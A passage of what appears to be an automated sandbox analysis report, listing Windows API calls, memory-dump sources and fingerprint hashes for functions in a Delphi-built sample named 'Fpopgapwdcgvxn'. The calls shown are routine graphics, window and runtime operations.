                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 351091851-0
                                                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                    • Instruction ID: 476c448e660474ad88534672072dba9c1f632b1a46d2294bbd4b303a84928243
                                                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                    • Instruction Fuzzy Hash: B551ED7991062AABCB26DB58DD90BD9B3FCAF08340F0441D5EA49EB211D674AFC48F61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CD6E4 Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032CD6EF
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032CD6FE
                                                                                                      • Part of subcall function 032CD6BC: ResetEvent.KERNEL32(00000288,032CD739), ref: 032CD6C2
                                                                                                    • EnterCriticalSection.KERNEL32(033302EC), ref: 032CD743
                                                                                                    • InterlockedExchange.KERNEL32(0331AAF0,?), ref: 032CD75F
                                                                                                    • LeaveCriticalSection.KERNEL32(033302EC,00000000,032CD88A,?,00000000,032CD8A9,?,033302EC), ref: 032CD7B8
                                                                                                    • EnterCriticalSection.KERNEL32(033302EC,032CD834,032CD88A,?,00000000,032CD8A9,?,033302EC), ref: 032CD827
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2189153385-0
                                                                                                    • Opcode ID: 94e5daeb57e323866707f8d4f0bf9d12095b8259dae3c6719b22ce6372b2c08e
                                                                                                    • Instruction ID: e6b10bacf944d582e31e0c0d9937775e711749c2c38ecce33fcc489e28c3c7d8
                                                                                                    • Opcode Fuzzy Hash: 94e5daeb57e323866707f8d4f0bf9d12095b8259dae3c6719b22ce6372b2c08e
                                                                                                    • Instruction Fuzzy Hash: D731F234A34784AFDB11EFA9DC90A6DB7F8EB09700F5586B8E400DA621D7B55881CB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D3F64 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 032D3FB2
                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 032D3FBE
                                                                                                    • GetDC.USER32(00000000), ref: 032D3FDA
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 032D4001
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 032D400E
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 032D4047
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceMetricsSystem$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 447804332-0
                                                                                                    • Opcode ID: 0e7975f63dd0fa00b2479d7cbbd113b45ea15a78a49f728db61c039cf49da8fb
                                                                                                    • Instruction ID: ea7bd71e46c3c9d253f21891747d5e38d5a314517af0950632071c04c7026a3f
                                                                                                    • Opcode Fuzzy Hash: 0e7975f63dd0fa00b2479d7cbbd113b45ea15a78a49f728db61c039cf49da8fb
                                                                                                    • Instruction Fuzzy Hash: DD315078A10349EFDB14EFA5C880AADBBB5FF89350F148565E918AF780C6719D80CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D43C4 Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032D4270: GetObjectA.GDI32(?,00000054), ref: 032D4284
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D43E6
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 032D4407
                                                                                                    • RealizePalette.GDI32(?), ref: 032D4413
                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 032D442A
                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 032D4452
                                                                                                    • DeleteDC.GDI32(?), ref: 032D445B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1221726059-0
                                                                                                    • Opcode ID: 8dc6e3218ec3d95a9795c989c6361f6e4e6d313ececc3eaeb10856c2c75f9401
                                                                                                    • Instruction ID: e8c7eff6a8d963586951495b21706d6bae9082094bd3de1274c06f2c41f73d06
                                                                                                    • Opcode Fuzzy Hash: 8dc6e3218ec3d95a9795c989c6361f6e4e6d313ececc3eaeb10856c2c75f9401
                                                                                                    • Instruction Fuzzy Hash: DF114F79A143047FDB10EBE9CC85F9EB7FCEB48740F5584A4B524EB680DAB499808764
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D3C10 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D3C29
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 032D3C32
                                                                                                    • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,032D61AF,?,?,?,?,032D4D27), ref: 032D3C46
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 032D3C52
                                                                                                    • DeleteDC.GDI32(00000000), ref: 032D3C58
                                                                                                    • CreatePalette.GDI32 ref: 032D3C9F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                                                    • String ID:
                                                                                                    • API String ID: 2515223848-0
                                                                                                    • Opcode ID: 06dcec53ca48781ffa93735ac4e44d2594361444003ffa06598b8e97dd5d723a
                                                                                                    • Instruction ID: c84ac9686e29fe21f2739ad8dc2c9cf65a4fccc03f0df12697470554dada64d9
                                                                                                    • Opcode Fuzzy Hash: 06dcec53ca48781ffa93735ac4e44d2594361444003ffa06598b8e97dd5d723a
                                                                                                    • Instruction Fuzzy Hash: 0601966A72430166D614E765CC46BAB72B89FC0790F19C819B6849F281E6B8C8848397
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D32F8 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032D2AC0: CreateBrushIndirect.GDI32(?), ref: 032D2B6B
                                                                                                    • UnrealizeObject.GDI32(00000000), ref: 032D3304
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D3316
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 032D3339
                                                                                                    • SetBkMode.GDI32(?,00000002), ref: 032D3344
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 032D335F
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 032D336A
                                                                                                      • Part of subcall function 032D1D04: GetSysColor.USER32(?), ref: 032D1D0E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3527656728-0
                                                                                                    • Opcode ID: 26b5bad37964a99be44aea8d5021ac51d4fdb6d7253912d4b1c6f075e744b768
                                                                                                    • Instruction ID: 3e2f78cd72d9d224c38ac9ffbe7c6e9245e122ce4ba6ed0305ff1051c7dd880c
                                                                                                    • Opcode Fuzzy Hash: 26b5bad37964a99be44aea8d5021ac51d4fdb6d7253912d4b1c6f075e744b768
                                                                                                    • Instruction Fuzzy Hash: 41F039BD620302ABDE54FFB8D9C5E4B77ACAF082457044490B904DF556CAE5E8909731
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B36D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032B36F2
                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,032B3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032B3725
                                                                                                    • RegCloseKey.ADVAPI32(?,032B3748,00000000,?,00000004,00000000,032B3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032B373B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                    • Opcode ID: f2d47bddf579ab65963322c3324eb2db3f4aa9a4991b205470bb5f1188d17c44
                                                                                                    • Instruction ID: 338e5e97f50a8b3651324075a71d5bea33b814edf13473b95e5e2c8b3619deeb
                                                                                                    • Opcode Fuzzy Hash: f2d47bddf579ab65963322c3324eb2db3f4aa9a4991b205470bb5f1188d17c44
                                                                                                    • Instruction Fuzzy Hash: 6E01B5BD960358BEDB11EB90CD42BFD73FCDB08B51F5000A2BB00D6981E6796550DB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032FBB50 Relevance: 7.7, APIs: 5, Instructions: 181COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 032FBC23
                                                                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 032FBCB2
                                                                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 032FBCE1
                                                                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 032FBD10
                                                                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 032FBD33
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 01e474a40ccc64a248e28924046ae9f7e049ee45dca20aef141c3d57fca7df9e
                                                                                                    • Instruction ID: ac58d094c9d8f2b692dcf9a50470b2691f3e76e576fc8c6d41f3e980b081ebea
                                                                                                    • Opcode Fuzzy Hash: 01e474a40ccc64a248e28924046ae9f7e049ee45dca20aef141c3d57fca7df9e
                                                                                                    • Instruction Fuzzy Hash: FD819774A10205EFDB44DB98C589EADB7F9AF49300F6941F5A908EB365CB70AE80DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032FD6F4 Relevance: 7.7, APIs: 5, Instructions: 174windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenu.USER32(00000000), ref: 032FD818
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 032FD835
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 032FD86A
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 032FD886
                                                                                                      • Part of subcall function 032B669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 032B66CE
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 032FD8CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$LoadStringWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1738039741-0
                                                                                                    • Opcode ID: 5a136c835533ec95ca29242527e2464f9efc67a111beee8b38f3baeae9b4f7ec
                                                                                                    • Instruction ID: 23c1797e5ed372b324123e8c017dd9f03d439c9ad7e029e5e9bc04f8d3f83d41
                                                                                                    • Opcode Fuzzy Hash: 5a136c835533ec95ca29242527e2464f9efc67a111beee8b38f3baeae9b4f7ec
                                                                                                    • Instruction Fuzzy Hash: 88519238A243054FDB25FB389894B9AF7986F45304F0845B5EE45DF29ACBB4D8C68750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DFF48 Relevance: 7.7, APIs: 5, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 032E0017
                                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 032E0068
                                                                                                    • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 032E00A1
                                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 032E00AE
                                                                                                    • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 032E0119
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Draw$OffsetRectText$Edge
                                                                                                    • String ID:
                                                                                                    • API String ID: 3610532707-0
                                                                                                    • Opcode ID: e757d04a822caaa49cb36ddf028efddfff750dd52677a383080a799048d94db4
                                                                                                    • Instruction ID: 94a24ad468cf4a623ac833bfc817e7fdb081ab7133853da0d4fdb600a8159575
                                                                                                    • Opcode Fuzzy Hash: e757d04a822caaa49cb36ddf028efddfff750dd52677a383080a799048d94db4
                                                                                                    • Instruction Fuzzy Hash: CB51A479A20309AFDF10EBA9C981B9EB7B9AF05710F588191F910AF291C7B4EDC18750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032E7B58 Relevance: 7.6, APIs: 5, Instructions: 139threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032E7FA0: WindowFromPoint.USER32(-000000F7,?,00000000,032E7B72,?,-00000010,?), ref: 032E7FA6
                                                                                                      • Part of subcall function 032E7FA0: GetParent.USER32(00000000), ref: 032E7FBD
                                                                                                    • GetWindow.USER32(00000000,00000004), ref: 032E7B7A
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032E7C4E
                                                                                                    • EnumThreadWindows.USER32(00000000,032E7AEC,?), ref: 032E7C54
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 032E7C6B
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 032E7CD9
                                                                                                      • Part of subcall function 032E6FE0: GetWindowThreadProcessId.USER32(?), ref: 032E6FED
                                                                                                      • Part of subcall function 032E6FE0: GetCurrentProcessId.KERNEL32(?,00000000,?,032E3C51,?,032E2D0D), ref: 032E6FF6
                                                                                                      • Part of subcall function 032E6FE0: GlobalFindAtomA.KERNEL32(00000000), ref: 032E700B
                                                                                                      • Part of subcall function 032E6FE0: GetPropA.USER32(?,00000000), ref: 032E7022
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2202917067-0
                                                                                                    • Opcode ID: 51660f54f7ad4f16234a5317dc64bb31ac3d24b7e0f3f18430b1337d119c80b4
                                                                                                    • Instruction ID: 19df3fe17c29d70ffbb8f04b773875b592484372747542dfb22677df772606ce
                                                                                                    • Opcode Fuzzy Hash: 51660f54f7ad4f16234a5317dc64bb31ac3d24b7e0f3f18430b1337d119c80b4
                                                                                                    • Instruction Fuzzy Hash: F8516C75A202199FCB10EF6CC485AEEB7F8BF08350F5481A5E919EB355D770E981CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032EF90C Relevance: 7.6, APIs: 5, Instructions: 126COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • BeginPaint.USER32(00000000,?), ref: 032EF937
                                                                                                    • SaveDC.GDI32(00000000), ref: 032EF970
                                                                                                    • ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,032EFA2E,?,00000000), ref: 032EF9F2
                                                                                                    • RestoreDC.GDI32(00000000,?), ref: 032EFA28
                                                                                                    • EndPaint.USER32(00000000,?,032EFA72), ref: 032EFA65
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3808407030-0
                                                                                                    • Opcode ID: 8372e59c3d5c56b9b07066363d5598baedd96c0a02956287160785457c0534b0
                                                                                                    • Instruction ID: cc5a0facd28d1d914f2881d8a4750cbea8c84df07f09c9650495c1068e361efc
                                                                                                    • Opcode Fuzzy Hash: 8372e59c3d5c56b9b07066363d5598baedd96c0a02956287160785457c0534b0
                                                                                                    • Instruction Fuzzy Hash: 9B41A175A14249AFDB04DFA8C955FAEBBF8FF08704F5A41A8E9049B361D774AD81CB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DFD88 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a62f9c0dba7c30d88d0bbd9bb0ab53a78bbb830797eea9b810b751a8907ca16f
                                                                                                    • Instruction ID: ec379136cadbc54b656414647d5e5981105fe077acf8b47fdee29224bd324b13
                                                                                                    • Opcode Fuzzy Hash: a62f9c0dba7c30d88d0bbd9bb0ab53a78bbb830797eea9b810b751a8907ca16f
                                                                                                    • Instruction Fuzzy Hash: 3A118436B713567ADB60EA398E04B9A76985F45B44F084455BD03DF347CAA8C8C582D8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D6164 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032D61BA
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 032D61CF
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 032D61D9
                                                                                                    • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,032D4D27,00000000,032D4DB3), ref: 032D61FD
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 032D6208
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2404249990-0
                                                                                                    • Opcode ID: a676d732ea28a78a5ffeab0e86a7dbc8e63a2c430c0596e67ed0b586c7f56290
                                                                                                    • Instruction ID: 4f3fa6bf07947d025be8c78f042cd08ccaef2fab94ac2cc5f480a56b14f0c49b
                                                                                                    • Opcode Fuzzy Hash: a676d732ea28a78a5ffeab0e86a7dbc8e63a2c430c0596e67ed0b586c7f56290
                                                                                                    • Instruction Fuzzy Hash: D011B2256653AA9EDB24EF24C844BEE3BA5AF51791F480161F8409F6C1D7F8C8D4C3A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03300E50 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 03300E84
                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 03300EB6
                                                                                                    • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,032FE5B4), ref: 03300EEF
                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 03300F08
                                                                                                    • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,032FE5B4), ref: 03300F1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$AttributesLayeredRedraw
                                                                                                    • String ID:
                                                                                                    • API String ID: 1758778077-0
                                                                                                    • Opcode ID: 09a0eb2e90d0940743469b14d29b62871de0e21f44c11d650bcace88f7e3990f
